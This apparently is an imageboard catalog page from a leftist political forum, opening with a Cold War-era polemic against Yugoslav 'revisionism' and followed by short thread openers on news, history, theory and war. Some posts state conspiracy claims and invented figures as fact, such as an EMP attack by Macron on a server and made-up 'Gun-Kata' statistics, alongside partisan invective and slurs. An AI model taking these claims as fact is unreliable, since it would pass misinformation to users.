The imperialists have always sought to cover up the nature of the state as a class dictatorship in order to wreck the revolutionary working-class movement. They describe the state under bourgeois dictatorship as “standing above classes,” “belonging to the whole people” and “democratic,” and slander the state under proletarian dictatorship as “totalitarian” and undermining democracy. Now that socialism and imperialism stand out in sharp contrast, with socialism in the ascendant like the sun rising and imperialism in murky decline, the working people under capitalist rule are turning towards socialism increasingly, the imperialists’ lies are more than ever losing their power to deceive and the anti-communist nonsense of the Social Democrats is proving more and more incapable of helping the imperialists. It is at such a time that the Yugoslav revisionists, donning the cloak of Marxism-Leninism, have come forward to serve imperialism, particularly U.S. imperialism, by peddling the bourgeois theory of the state standing above classes, so as to repay U.S. imperialism for its reward of large sums of American dollars.
State power in an imperialist country is a means of serving the handful of monopoly capitalists and exercising dictatorship over the overwhelming majority of the people. Yet the Yugoslav revisionists are at great pains to conceal the dictatorship character of the imperialist state power. They say that in the capitalist world “the state increasingly controls the activities of capital” and “restricts the role of private capital,” that “the role of the state as that of a regulator also grows” (Draft Programme of the League of Communists of Yugoslavia) and that “the state is no longer the apparatus of a certain class in capitalist society; it no longer reflects or upholds the special interests of that class” (“Has Capitalism Changed?” by R. I., October 1956 issue of the Yugoslav magazine The Truth About Us). Glorifying imperialist state power in such a fashion, are they not toeing the line of the imperialists?
The outstanding feature of our age is the transition from capitalism to socialism. Through revolution in one form or another, the working class must smash the bourgeois state apparatus, set up the proletarian state apparatus and replace bourgeois dictatorship by proletarian dictatorship. Marxist-Leninists, therefore, have always held that seizure of state power is the crucial question in the proletarian revolution. Using sophistry, the Yugoslav revisionists insist that state capitalism in the capitalist countries is a “factor of socialism,” that socialism is taking form within the capitalist system, and that the bourgeois state apparatus is also changing in this direction. Consequently, there is no need for the working class to carry out proletarian revolution, to smash the bourgeois state apparatus or to set up its own state apparatus. They claim that by “exercising incessant pressure” on the bourgeois state apparatus and working to “exert a decisive influence” in it, the working class will be able to “secure the development of socialism.” They are spreading this nonsense about “peaceful evolution” from capitalism to socialism in order to create ideological confusion within the ranks of the revolutionary working-class movement, to paralyse, corrode and sap the revolutionary willpower of the working class and Communist Parties in the capitalist countries, and to prevent proletarian revolution. This being so, what trace of Marxism-Leninism do they show, what markings other than those of an accomplice of the imperialists?
Since the Great October Revolution, one-third of mankind has smashed the bourgeois state apparatus and established their own states of proletarian dictatorship. The proletarian dictatorship in these countries is fundamentally different in nature from dictatorship by all exploiting classes. It is the dictatorship of the exploited class, the dictatorship of the many over the few, dictatorship for the building of socialist society free from exploitation of man by man. It is the most progressive, and also the last, dictatorship in human history which is undertaking the greatest and most difficult historic task of eliminating classes, and it is forging ahead in conditions of most complex struggle, along the most tortuous road ever known in human history. With a history of only forty years, it is impossible for the dictatorship of the proletariat to avoid making some partial mistake or another, in the course of its advance. Whatever the mistakes, since proletarian dictatorship is the system of the people themselves, it will learn from mistakes and correct them by itself. But the Yugoslav revisionists, following the imperialist reactionaries, venomously attack the proletarian dictatorship in the Soviet Union and the other socialist countries. They call the state system of the socialist countries ‘‘bureaucracy and bureaucratic statism.” They fiercely attack the Communist Parties in the socialist countries for holding the leading position and exercising the leading role in the life of the state and slander direct leadership and supervision by the Communist Parties in these countries over the work of the state as giving rise to “the growth of bureaucracy in the Party” and “statism.” A mere glance shows that the weapons used by the Yugoslav revisionists against the Soviet Union and the other socialist countries come from the arsenals of the imperialists. It is just because they brandish these antiquated weapons in the name of “Communists,” with the status of a “socialist country,” and under the cloak of Marxism-Leninism, that they win special approval and plaudits from the U.S. imperialists.
All the classical writings of Marxism-Leninism show that socialist state power is the dictatorship of the proletariat, i.e. the proletariat organizing itself as the ruling class. After seizing power, the proletariat must exercise dictatorship through its own state apparatus over the vanquished exploiting classes, carry on the class struggle in the new conditions and solve the problem of whether the socialist road or the capitalist road will win out, so as to eliminate classes. But the Yugoslav revisionists maintain that socialist state power should not be an instrument of force, should not exercise dictatorship over the class enemy and should not conduct struggle between the socialist and capitalist roads. At the same time, they make no little fuss about the so-called question of democracy, attacking the socialist countries under the pretext of promoting “democracy.” Tito has manufactured the pretext that “we are always emphatically against regarding the proletarian dictatorship as mere force,” as though there were only dictatorship and no democracy in the socialist countries. Since the class enemy still exists in the period of transition, and there are antagonistic contradictions between them and the proletariat, contradictions between the enemy and ourselves, dictatorship must be exercised if such contradictions are to be resolved. As to democracy, all democracy is merely a form of class rule. Democracy that is divorced from proletarian dictatorship can never be democracy under the socialist system. In essence, bourgeois democracy is dictatorship by the few over the great majority, the working people, while proletarian dictatorship means democracy for the great majority, the working people. Either the enemy wipes us out or vice versa; either bourgeois democracy or proletarian democracy. The dictatorship of the proletariat is a unity of dictatorship and democracy. Comrade Mao Zedong once said: “Democracy for the people and dictatorship over the reactionaries, when combined, constitute the people’s democratic dictatorship” (On People’s Democratic Dictatorship); “dictatorship does not apply in the ranks of the people. The people cannot possibly exercise dictatorship over themselves; nor should one section of them oppress another section”; “under the people’s democratic dictatorship, two different methods — dictatorial and democratic — should be used to resolve the two kinds of contradiction of different nature — those between ourselves and the enemy and those among the people.” (On the Correct Handling of Contradictions Among the People) By opposing democracy to dictatorship while chattering about abstract democracy, denying the necessity of dictatorship over the class enemy, the necessity of struggle between the socialist and the capitalist roads, the Yugoslav revisionists are simply trying to create confusion within the socialist countries in co-ordination with the subversive activities conducted against these countries by the imperialist countries.
R: 413 / I: 58  

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R: 12 / I: 0 (sage)
the server hard drive was targeted with an EMP weapon by jvpiter macron for the same reason he targeted pavel durov: too much archived info about the ukkkraine war that is inconvenient to westoids


this thread was so fucking valuable. and now it's full of broken links
R: 7 / I: 1

Reading of the Day 10 - We're so back

Mods, why was the Mao head removed? Alas, the only good tricolor will suffice for now.

Passing the Buck: Naturalism and Individualism as Anthropological Expressions of Euro-American Denial
<by Michael L. Blakey

This essay concerns the role that physical anthropologists have continually played in the support of ideologies of human inequality. This professional trajectory began with the overt espousal of polygenist racism in the nineteenth century and finds expression today in current, often obscurantist, research orientations that privilege individualist over social, cultural, and political explanations. By examining this history, I seek to show how mainstream biological and biomedical anthropology have been influenced by and had an influence upon Euro-America's denial of its participation in a racist and classist social order.
This pattern of denial partly originates in longstanding Euro-American conservative beliefs that nature and individuals — not social institutions — are ultimately responsible for a society's social ills, which, therefore, cannot or should not be solved by public policy initiatives requiring economic redistribution. No dominant societal group or exploitative social, political, or economic structures are at fault. Something may be wrong, but no one has been wronged. Justice and individual liberty are believed to prevail within a natural order that is sometimes unkind. These ideas, in which physical anthropologists are socialized and against which they must struggle, legitimate the status quo conditions of life in the United States and in other capitalist societies.
Aristotle comments in Politics that some philosophers and jurists "detest the notion that, because one man has the power of doing violence and is superior in brute strength, another shall be his slave and subject." Aristotle then proceeds to resolve the contradiction between a virtuous but slaveholding society by explaining that this condition is natural. He argues what his teachers knew to be false (Gould 1981:19-20): some were born to be slaves, while others were natural masters; dominion over natural slaves enhanced a natural master's virtue. This justification of inequity as natural would remain endemic, untested, and marginal compared to other justifications throughout much of European history. Only with the convergence of "scientific" biology and U.S. slaveholding some millennia after the philosopher's death did naturalism advance to center stage and become a powerful ideological tool.
During the period of U.S. slavery, as Gould (1981) has amply demonstrated, theories of racial ranking (whites on top, blacks on the bottom) and polygenic origins (separate for each "race") were central concerns of U.S. anthropology. The creation of a biological ideology of white supremacy in the craniometry of Samuel Morton and the theorizing of Louis Agassiz were not at the periphery but were the very mainstream of nascent anthropological science (see also Bieder 1986; Harris 1968: chap. 4). The scientific justification for slavery and the inhuman treatment of Native and African Americans supplanted an earlier religious justification that made slavery and genocidal colonialism consistent with Christian charity — the souls of the conquered and enslaved would be saved. As the religious rationale weakened under the weight of its own contradictions (the success of Christianization), biological theories emerged to give a natural basis for white dominance over "the other" so-called racial groups.
The African-American statesman and abolitionist Frederick Douglass disputed the anthropological claims of Morton, Nott and Glidden, and Harvard's Agassiz in 1854, in "The Claims of the Negro Ethnologically Considered" (1950). He showed their analysis to be an attempt to make blacks out to be less than human, and he pointed to evidence against their misappropriation of ancient Egypt as a demonstration of European rather than African accomplishment and intellectual capacity. Douglass outlined the importance of social and environmental "circumstances upon physical man" in opposition to the reverse argument made by these establishment biological determinists. Indeed, Douglass emphasized the effects of social and economic inequity in the similarities of social behavior and physical condition of Irish manual laborers and African-American plantation slaves. Thus, the kinds of antiracist (and social science) arguments that would later be taken up by Franz Boas and others in the twentieth-century nature-nurture debate were used much earlier by Douglass, at the very origins of racial determinism. Douglass's argument, however, placed less emphasis on individual change through acculturation than Boas's, and more on persisting socioeconomic inequity.
With the end of U.S. slavery, the vigor of mainstream physical anthropology declined. As the discipline regrouped, Ales Hrdlicka, the leading professional physical anthropologist during the first third of the twentieth century, lamented the lapse in U.S. craniometry that followed the Civil War (Hrdlicka 1918; Brace 1982). Hrdlicka's own craniometric research sought to account for the unequal social and economic attainments of new immigrant groups from southern and eastern Europe, of African Americans, and of women as results of inferior brains (Hrdlicka 1925, 1928). He also explained the high mortality of indigenous peoples under the press of colonial expansion as a natural process of evolutionary advance. "We see that the higher civilized white man has already in some respects outdistanced others," Hrdlicka wrote, "that he is rapidly diversifying, and that all about us those who cannot keep the accelerated pace are being eliminated by nature" (1915, emphasis added; see also Blakey 1987).
R: 23 / I: 6  

Gun-kata : The Pinnacle of Combat

A single strike from a modest 9mm handgun creates over thirty-seven times the pressure-per-square inch than the world's hardest hitting boxer's fist. This immense force means that each bullet delivers a devastating impact far beyond what any human strike could achieve.
A single fully automatic handgun can strike four to six times faster per second than the world's fastest boxer can throw punches. This disparity in speed and power means that any untrained firearm user unleashes a barrage of bullets that no human can match in terms of frequency and consistency.

The gun stands alone as an unparalleled force. On average, the gun is one hundred and eighty-five times more decisive than the world’s most skilled unarmed fighter. No other melee or ranged weapon can rival the gun’s decisiveness, regardless of the wielder’s expertise. The gun’s supremacy in combat is a testament to its unmatched decisiveness and devastating force.

The martial art of Gun-Kata takes humankind's most decisive weapon and perfects its application. With mastery of Gun-Kata, the gun—no longer mere weapon—becomes an extension of the master's body. The essence of Gun-Kata lies in its ability to maximize the effectiveness of firearms through the application of martial arts principles. By combining the decisiveness of modern weaponry with the discipline and technique of traditional combat arts, Gun-Kata creates a new paradigm of combat.
Consider the geometry of combat. A conventional shooter, with a single firearm, is limited to a narrow cone of fire. Their focus is linear, their action constrained by the very action of aiming and shooting. But a Gun-Kata master, dual-wielding, operates within a dynamic sphere of influence. Their arms move independently yet in harmony, creating overlapping fields of fire that cover a 360-degree radius. Each gun represents a vector of force and direction. When combined, these vectors create a resultant force that is greater than the sum of its parts. The angles they cover are not just doubled; they are multiplied exponentially. The Gun-Kata master, through training and instinct, calculates these vectors in real-time, adjusting their stance, grip, and aim to maximize their lethal potential.
While a conventional shooter relies on predicting the target’s movements to aim and fire, the Gun-Kata master flips this on its head. The gunkata master has honed their ability to introduce these small, unpredictable changes into their movements. They shift their weight, alter their stance, and pivot with such precision that their trajectory becomes a series of unpredictable variables. The Gun-Kata master operates in a realm where linear predictions fail. Utilizing non-linear dynamics, their movements are fluid, adaptive, and seemingly random, making it impossible for a conventional shooter to lock onto them. They exploit the milliseconds of hesitation and recalibration that their unpredictable movements force upon their opponent. In close-quarters combat, this technique becomes even more pronounced. The Gun-Kata master moves with a speed and agility that defies conventional tactics. They weave through danger like a specter, their body a blur of motion that the untrained eye struggles to follow. Each dodge, each sidestep, is a calculated maneuver designed to exploit the shooter’s momentary lapses in accuracy.
R: 16 / I: 1 (sage)

Change my mind

You only seethe about "class warfare" because you're not on the winning side.
R: 582 / I: 73

Socialist copyright


How would IP laws and copyright be handled under socialism?

Would it be abolished or just reformed? How would artists be compensated if not for royalties?

Also, what about “hard cases” like instances of cultural appropriation, etc.?

Let’s have this discussion.
R: 2 / I: 0  

Greek Thread

Since the anti-campist thread was deleted I figure its time to replace it with its natural upgrade.

KKE Chads just can't stop winning!


R: 250 / I: 69  


Multipolarism, in its most basic form, posits a world where multiple powers (countries or entities) exist in a state of relative equilibrium, challenging the unipolar hegemony led mainly by the United States post-Cold War. The emergence of China, the reassertion of Russia, the rise of regional powers like India, Brazil, and South Africa, among others, suggest a move towards this multipolar world.

BUT is it rly just Capitalism 2: Electric Boogaloo - Neo-Dengism Edition? To what extent is multipolarism just capitalist nationalism for people not in green on this map? If the whole thrust of socialism is now just "America bad" what becomes of the classical socialist goals of workers control of the means of production, and abolishing class society?

🇧🇷 • /brg/ - Brazil general >>>/leftypol/1880511
🇷🇺🇺🇦 • /ukr/ - Russia-Ukraine war general >>>/leftypol/1909563
🇮🇳 • /subcontinental/ - India, Pakistan, Nepal, Bangladesh, Buthan general >>>/leftypol/1828924
🇨🇳 • /prc/ - People's Republic of China general >>>/leftypol/211384
🇿🇦 • /africa/ - Africa general >>>/leftypol/1831758
R: 7 / I: 2
Georg Elser was a German carpenter and trade unionist who attempted to assassinate Hitler and other senior Nazi figures on 8 November 1939 by placing a homemade bomb in a Munich beer hall where the Führer was giving a speech.

Elser, a supporter of the communist Ernst Thälmann and a voter of the Communist Party of Germany, was an early opponent of Nazism. His motive, apart from his anti-fascism, was to stop the war with Poland and to improve the conditions of workers in Germany.

Hitler had left a few minutes earlier when the bomb exploded. Seven people were killed (all but one were members of the Nazi Party) and 62 were injured.

Elser was arrested and taken to concentration camps where he was tortured. On April 9, 1945, before the German surrender, Elser was shot dead on Hitler's direct orders.
R: 25 / I: 4

Workers' strike crushed by Khrushchev

In 1962, mass protests by workers in the Soviet city of Novocherkassk took place against the lowering of wages and raising of prices by Nikita Khrushchev's government. The workers carried portraits of Lenin, red flags and sang communist revolutionary songs.

As the workers surrounded the central building of the city, Khrushchev sent in the army to suppress the workers, who trusted in the Red Army and its good will towards the workers. 26 protesters were killed and some 82 were wounded.
R: 10 / I: 2

News 9/12/24

Alberto Fujimori, a former president of Peru who was convicted of human rights abuses, dies at 86
Fujimori, who governed with an increasingly authoritarian hand in 1990-2000, was pardoned in December from his convictions for corruption and responsibility for the murder of 25 people. His daughter said in July that he was planning to run for Peru’s presidency for the fourth time in 2026.

Chile's President vows to repeal amnesty law for Pinochet crimes
In a speech on Wednesday commemorating the 51st anniversary of Gen Pinochet’s bloody US-backed military coup against the elected left-wing government of Salvador Allende, Mr Boric said: “We renew our commitment to democracy and human rights, always, in our country and everywhere in the world.

Mexican senate gives final approval to sweeping changes to judiciary
In a marathon session that ran for more than 12 hours, and had to be paused and relocated after protesters broke into the senate building, the ruling Morena party and allies clinched the final two-thirds vote needed to approve the changes, which have prompted protests, a strike by judicial workers and market volatility.

Eight Palestinians killed in Israeli strikes on occupied West Bank
Israeli strikes Wednesday killed eight Palestinians in the occupied West Bank, the Palestinian health ministry and Red Crescent said separately, with the Israeli military confirming air raids in two locations.

Iranian Kurdish groups nervous as Pezeshkian visits Iraq for security talks
Faramarzi said that it had become "increasingly challenging" for Iranian Kurdish parties to operate in northern Iraq, noting the growing influence of Iranian intelligence and the cooperation of Iraqi Kurdish officials. "The Iranian regime is aware that the influence of the Kurdish parties is significant among the general public," he said.

US greenlights military assistance to Egypt, overruling rights concerns
Normally, part of that aid would be subject to conditions requiring Egypt to implement improvements to its human rights record. But on Wednesday, US Secretary of State Antony Blinken told Congress that the military assistance would not face the usual conditions.

Opposition candidates file court appeal questioning Algerian presidential election outcome
Islamist Abdellali Hassani Cherif and socialist Youcef Aouchiche filed appeals with Algeria’s Constitutional Court, taking the first step required to challenge the results of the election, which incumbent President Abdelmadjid Tebboune won with a 94.7% share of the vote.

Starmer told to come clean on consequences of axing winter fuel payments
PRIME Minister Sir Keir Starmer was told to come clean on the cruel consequences of callous cuts today after MPs voted through the axing of winter fuel help for 10 million pensioners. .

Biden planning to ease restrictions on Kyiv's long-range strikes, Politico reports
U.S. President Joe Biden is finalizing the details of a plan to lift some restrictions on Ukraine's use of American long-range weapons to strike targets deep in Russian territory, Politico reported on Sept. 11, citing unnamed officials familiar with the discussions. …

Tributes paid to Communist Party of India-Marxist leader following his death
The Association of Indian Communists, the overseas organisation of the CPI-M, said it was “extremely saddened by the devastating news.” A statement said: “Comrade Sitaram, a much-loved leader of the masses, was very familiar with Britain and the international working-class movement.

Australian police launch brutal crackdown on thousands of anti-war protesters
About 1,800 police were deployed and used pepper spray, flash distraction devices and rubber bullets on protesters outside the huge biennial Land Forces International Land Defence Exposition. …

Lawmakers discuss plan to gradually lift retirement age in China
China’s top legislature has reviewed a plan to gradually raise the retirement age, months after the ruling Communist Party’s Central Committee proposed it be lifted in a “voluntary and flexible” way. The retirement age has been in place since 1951 and is among the lowest in the world.
R: 495 / I: 110
This is Mexico's new left wing president, and first female president in the country, say something nice about her.

>Will continue the plans the previous president had

>Aims to push education and scientific reforms to push the country to the next level
>Has a PhD in Engineering, and part of a Nobel prize winning team that developed research to counter global warming

Honestly the future is fucking bright for us
R: 115 / I: 7 (sage)
>according to Cockshott (a comrade, who defined for a generation how we should lower working hours WHILE enducing productivity,) the Barista working in UK/USA is 1200x more exploited than the fucking Africans harvesting those coffee beans.

Is he, like, retarded?
R: 15 / I: 2

Why have Americans with TDS forgotten how bad Bush Jr was?

Bush Jr brought us the forever wars, millions of dead Iraqis and Afghans, the PATRIOT Act, surveillance state, Evangelical madness (he claimed God told him to invade Iraq), etc. Even Killary once called his VP Cheney the "Darth Vader of the Republican Party". But libs with TDS have conveniently forgotten about all this, and think Trump was worse because of mean tweets.
R: 4 / I: 0
It is no secret that the mods have access to our IP addresses (IF they want to check) therefore ro our countries of origin where we post from.

I would like to ask the mod team to generate monthly data based on /thread/ participation [BY COUNTRY] + pro/against predisposition in thread.

A simple % per thread per country of origin would suffice. I would guess, for example, that 50% of the negative posts regarding the USA inside /USApol/ would come from non-USA citizens.

I would also guess, that 70% of the negative comments about China would come from NATO countries.

You get my point, really. All of this could be avoided, by say, making every second month "meme-flag-denial" and "location-flag" month.

Meaning, that we get to see the country of origin every second month INSTEAD of their meme-ideology-flag for a change.

I honestly think this would, on the long run, improve leftypol.
R: 9 / I: 1

We already live in a dark age

We've probably been in one for at least 25 years. The Dark Age will not be televised.

Once capitalists won the Cold War, there was no longer a need for research supremacy over the Soviets, and the system no longer needed to moderate its worst impulses in order to justify itself, and so we returned to the old-style evil proto-fascistic capitalism we had thought died during the New Deal era. The 1990s boom masked this, at least in the US where people were able to get rich on stocks and tech; it wasn't clear until the 2010s that this was a long-form decline, but it is one.

Future societies will look upon this as another gilded age.
R: 11 / I: 2

Urbanism-induced cultural genocide

I’ve been monitoring Africa a lot more than usual, and a thought came to me about the historical mass migrations of entire populations towards centralized settlements throughout history. One pattern that is visible among these migrations is the idea that cultural genocide is the primary contributor to these movements. Whether it’s war, famines, jobs, extradition, etc. in some way or another, people tend to move towards centralized areas when their leaders are shot and their interpersonal connections and values are destroyed. Cultural genocide by modern day capitalism is much stronger than before, because the mechanisms that force the dissolution meant of leadership, norms, and ideologies are actualized in the logistics infrastructure and level of integration present. Going back to Africa, this exact idea holds true, because you can see the escalation of interethnic conflict, degradation of political leadership and values, and rapid increases in urban migration not seen in Eurasia and South America explicitly due to the increased integration different peoples have as the road, railway, and information networks expand and intertwine with each other.
Marx and Engels were right about capitalism’s tendency to force the proletariat towards urban clusters, but to say that such movement was explicitly tied to exploitation alone fails to consider the many other contributions that could lead to such a phenomenon.
R: 63 / I: 13

Generation ZYKLON

what happened to the whole meme about Gen Z turning out to be far right? It doesn't seem like it turned out that way. Maybe zoomers who were already right wing became more right wing than they already had, or more "radicalized" somehow in that they are more willing to ditch bog standard liberal democracy in favor of some sort of unitary theocratic republic (i.e. Iran but Christian)? Or are just more pissed off in general? But thats not really a change.
R: 9 / I: 0
On 6 September 1966, 48-year-old Greek-Mozambican communist Dimitri Tsafendas stabbed to death South African Prime Minister Hendrik Verwoerd, the architect of Apartheid.

Tsafendas was a veteran of the Greek Civil War fighting on the communist side. He was also an activist for Mozambique's independence from Portugal.

After being tortured, Tsafendas was declared insane and sent to a psychiatric hospital. Despite living to see the fall of Apartheid, Nelson Mandela's new government did not release him. He died in custody in 1999.
R: 2 / I: 0
Why did Plekhanov and Ilyenkov worship Spinoza so much? They completely misunderstood his philosophy and tried to shoehorn him into an understanding of materialism and only vulgarize it as a result.
>Georgi Plekhanov, the creator of the term "dialectical materialism," also designated Marxism as "dynamized Spinozism"
how fucking embarassing! Spinoza's philosophy was not in finding a logic for the real physical universe, but of some theoretical world, the imagined concrete. Marx's materialism is the complete opposite and rises from Hegel, dealing with relation between substances and their process of change from contradiction. Not Spinoza's substance that derives more from Plato. We don't arrive at the essence of things by some abstract substance, we arrive at it by understanding all it relates with and how its existence influences them. Where did they learn their Spinoza? A shitty Russian translation?
R: 461 / I: 58 (sage)


This thread is for the discussion of cybercommunism, the planning of the socialist economy by computerized means, including discussions of related topics and creators. Drama belongs in /isg/

Towards a New Socialism by Paul Cockshott and Allin Cottrell: http://ricardo.ecn.wfu.edu/~cottrell/socialism_book/
Brain of the Firm by Stafford Beer
Cybernetic Revolutionaries by Eden Medina
Cybernetics: Or the Control and Communication in the Animal and the Machine and The Human Use of Human Beings (1st edition) by Norbert Wiener
Economic cybernetics by Nikolay Veduta
People's Republic of Walmart by Leigh Phillips and Michal Rozworski
Red Plenty by Francis Spufford
Economics in kind, Total socialisation and A system of socialisation by Otto Neurath (Incommensurability, Ecology, and Planning: Neurath in the Socialist Calculation Debate by Thomas Uebel provides a summary)

Active writers/creators
Sorted by last name
>Paul Cockshott
https://www.youtube.com/channel/UCVBfIU1_zO-P_R9keEGdDHQ (https://invidious.snopyta.org/channel/UCVBfIU1_zO-P_R9keEGdDHQ)
https://twitter.com/PaulCockshott (https://nitter.pussthecat.org/PaulCockshott)
>Cibcom (Spanish)
https://twitter.com/cibcomorg (https://nitter.pussthecat.org/cibcomorg)
https://www.youtube.com/channel/UCav9ad3TMuhiWV6yP5t2IpA (https://invidious.snopyta.org/channel/UCav9ad3TMuhiWV6yP5t2IpA)
>Tomas Härdin
https://www.youtube.com/channel/UC5fDgA_eHleDiTLC5qb5g8w (https://invidious.snopyta.org/channel/UC5fDgA_eHleDiTLC5qb5g8w)
>Elena Veduta
Various videos on YouTube but no channel of her own
>Dave Zachariah
One video on Paul Cockshott's channel

>General Intellect Unit
Podcast of the Cybernetic Marxists

Previous threads in chronological order
R: 4 / I: 0

Moffious random PDF critique thread


Ok so now that I have your attention we're are gonna discuss and critique with me this PDF I found open among my old browser tabs.


Most importantly, I found a couple of points the author makes that made me turn up my nose.
> One way of determining the underlying productivity of an industry in a country is its turnover. Higher rates of turnover suggest higher rates of productivity, because it implies shorter periods of production and or circulation.

What the hell is this!? The author seems to correlate higher turnover with either higher wages coming from workers changing employeers in growing sectors, or implies that workers with higher wages have a higher tndency of switching jobs.
But how does any of that connect with productivity? If anything, to my knowledge, in a number of sectors, expecially the more specialized ones such as IT, bringing in new people is always a cost since they need to be trained, something that is even harder if the other workers with the field knowledge are leaving in droves.
On the top of that, onboarding time is tipically the lowest in unspecialized jobs, which are typically those with low productivty due to the high level of organic capital, which is itself caused by the low skill required to enter and hence a very large amount of possible job applicats bringing down the price of labor.
So if anything, I would say that either this point is completely moot or potentially the author got this completely upside down.

> I have always portrayed this graph as representing the two arms embracing socialism. The top graph representing the possibilities lodged in socialism, and the bottom graph, because of its stagnant investment, the graph representing the necessity for socialism. The gap is somewhat overstated because it does not include the growth in circulating capital, evertheless, the trends show it to be real and growing over time.

< The Nth hundered "financial capital bad industrial capital good"
This is a fallacy which I don not know how is diffused amongst both western dengists and patsocs, which fundamentally ignores the industrial origins of financial capital and seems to reproduce the dangerous revisionis position of "bad capital vs good capital" which is a core precondition for class collaborationism, as it excuses the bourgeois as a class and puts the whole of the blame on a subsection of it for being "unpatriottic" or otherwise non-progressive while not significantly altering the capitalist system with it's relationships

Source of the PDF: https://theplanningmotive.com/wp-content/uploads/2019/11/super-exploitation-pdf.pdf
R: 81 / I: 11
Why do pacifists never elaborate on how they believe a non-violent revolution can succeed in overthrowing capitalism and the overall status quo?

I’m not saying run around and commit acts of adventurist violence (hi FBI!). I’m saying those who advocate overthrowing the system “peacefully” never, ever explain how they intend to do it. At least those who advocate pure electoralism like EuroComms can claim to have a strategy, even if it’s a bullshit one. But what about those who believe in working entirely outside the system like civil disobedience and whatnot? Plus we’ve seen how non-violent attempts at socialist Revolution get quickly destroyed since they have zero way of defending the revolution from oppressors and opposition.

Again, the purpose of this post isn’t to advocate violence but to make pacifists explain how they intend to accomplish what we want to accomplish through entirely non-violent means.
R: 120 / I: 12

I'm gonna say it. I don't care about the Soviet Union

It happened. I can apreciate the things that people that participated in its formation and history said and wrote about. But I don't care about the entity. More importantly, I don't care about the aesthetics.
R: 537 / I: 179

/brg/ - Brazil General

D.E.P. Maria da Conceição Tavares Edition.

O lugar mais web-revolucionários para discutir as idas e vindas de nossa amada Pindorama.
Edição anterior: >>1793453
R: 32 / I: 9

☢️/BOOM/ Another Nukes Thread☢️

The purpose of this thread:
This thread is exclusively for the discussion, analysis and news about weapons of mass destruction and nuclear war. It does not endorse or promote them, but rather serves to bring people to study their effects and consequences.
Some notes:
1. The cost of the Manhattan Project (through August 1945) was an estimated $20,000,000,000 .
2. The total number of nuclear missiles built, 1951-present is estimated to be 67,500 .
3. A nuclear holocaust is more probable to occur than a “global killer” meteor hitting the planet.
In the case of nuclear war, or an announced doomsday - what will YOU do? Will you have sex? Cry and hide? Or do something interesting? Have sex and go BERSERK? Or will you figure out a way to outwit everyone and survive?
Recommended books:
Nuclear War Survival Skills - Cresson H. Kearny
I Want to Believe: Posadism, UFOs and Apocalypse Communism - A.M. Gittlitz
Doomsday Bunker Book: Your Complete Guide to Designing Surviving and Living in an Underground Concrete Bunker - Ben Jakob
Endgame, Vol. 1: The Problem of Civilization - Derrick Jensen
Endgame, Vol. 2: Resistance - Derrick Jensen
Nihilist Communism - Monsieur Dupont
Alas, Babylon - Pat Frank
Podcasts / Radio / Broadcast:
https://revolutionaryleftradio.libsyn.com/posadism (podcast episode on Posadism)
https://www.spreaker.com/podcast/prepper-talk-radio--2209431 (funny conservatives)
https://www.infowars.com/show/ (the funniest, craziest conservatives of the internetz)
Threads 1984
The Road 2009
When the Wind Blows 1986
The Day After 1983
Countdown to Looking Glass 1984
R: 36 / I: 5
The casualty numbers of Palestinians in Gaza climbed up from roughly 40,000 to 200,000 in several months, which is around 10% of the Gazan population. If this goes on and Palestinians end up killed off to a large part or entirely, do you think Western liberals who aren‘t on the left side of the spectrum will just flat out deny that there was a genocide or justify it? Will it become one of those subjects?
R: 170 / I: 15

The thing about Venezuela is a mess.

Hola a todos

You all probably already knew this, but this is more of a vent for all the liberal media garbage.

With respect to Venezuela, there is a lot of half-baked news and hoaxes taken from who knows where. From the dissemination of old videos that occurred in 2017 or that have nothing to do with it, to literally things taken with AI or that are directly acted.

Likewise, they have been putting Maria Corina Machado, the opposition leader, who is actually the daughter of oligarchs, and Edmundo González, an affable puppet with whom the guarimberos emphasize, at an absurd level.

We cannot forget the quasi-terrorist level of many opposition demonstrations, which are orchestrated by criminal groups that disguise themselves as: "workers fighting for FREEDOM."

Is this orchestrated by the North American and European oligarchies? For sure.

We are all for the Venezuelan workers in favor of their liberation and social progress against imperial pretensions and being concerned about this situation.

(Yes, it's not a big deal, but it's something I had to release)
R: 25 / I: 3
>CIA has funded the implementation of protestants in Brazil. :D
>Around the 80's and 90's more protestant "churches" were being opened in Brazil than drugstores. :)
>Brazil is the biggest catholic country in the world, but it's numbers of catholics are decreasing while the number of protestants is growing. ;D
>The most popular protestant "church" in Brazil is called Assembleia de Deus, and they originated in Hot Springs, Arkansas from the United States of America. Proof: https://pt.wikipedia.org/wiki/Assembleia_de_Deus ^-^
>Brazilian protestants have adopted the narrative that Israel = good. (:
>There are evangelical gangs who often threat people of other religions. ;)

Thank you america, our country sucked but fortunately you sent some superior people to show us how to be civilized, right…?
R: 162 / I: 17

FERTILITY vs Capitalism

how big of a problem is population decline for capitalism?

I know people have been desensitized to the issue of population decline due to right wingers panicking about the white birth rates or china doomers proclaiming the end of China or whatever, but in all seriousness -

If human activity i.e. labor is the ultimate source of value doesn't it imply that for capitalism to increase its profits, either 1) per-worker productivity/skill has to increase or 2) the population has to increase.

This is simple common sense. There could be some deus ex machina coming from outside the system i.e. general ai and robots becoming a perfect substitute for labor or full ectogensis allowing porky to simply clone workers for themselves, but outside the more outlandish predictions of scifi, this will be a problem.

bottom line, the rate of population growth is the determinant of the long-run rate of profit, and this ultimately means capitalism will decline after the world population peaks sometime in the 2080s if estimates hold (if not even earlier).
R: 72 / I: 7

Racist riots in UK after stabbing

Someone who may or may not have been a migrant stabbed a few kids in Britian and now reactionary white Birts are out on the streets fighting police and attacking mosques. Why aren't there antifascists out there fucking up these racist rioters and defending brown people like in Greece when golden dawn nazis tried the same shit?
R: 0 / I: 0

I deleted myarchive. on the other hand, question about filter and mass deletion internet wide scale?

im the poster who says that he will archive he prc thread cycles and every other thread here, especially the country and anti-lib ones here. i actually deleted all the archives a long time ago. nothing is left. i want to let all of you know this so that you guys don't have to worry about stupid and bad shit from here being in somebody's computer or hard drive. every threads, images, brainworm stupid compass-dicotomy-isms, radlib terminologies and etc are all deleted, don't worry. i encourage others who don't erase isms, flags, symbols, compasses, compass-dicotomy-isms and etc (that's not inside marxism and tankie stuffs, in this case the words will just be changed) in their folders to erase theirs as well as if it were never there to begin with.

anyway, the other reason why i want to make this thread is because i want to ask you guys what's your opinion on filter and mass deletion. what media, language and words in the internet, servers, hard drives, portable storages and devices around the world should be filtered and deleted. answer ?

sorry for the broken english and paragraph.
R: 65 / I: 27

A thread in advance for Nigeria’s upcoming political revolution

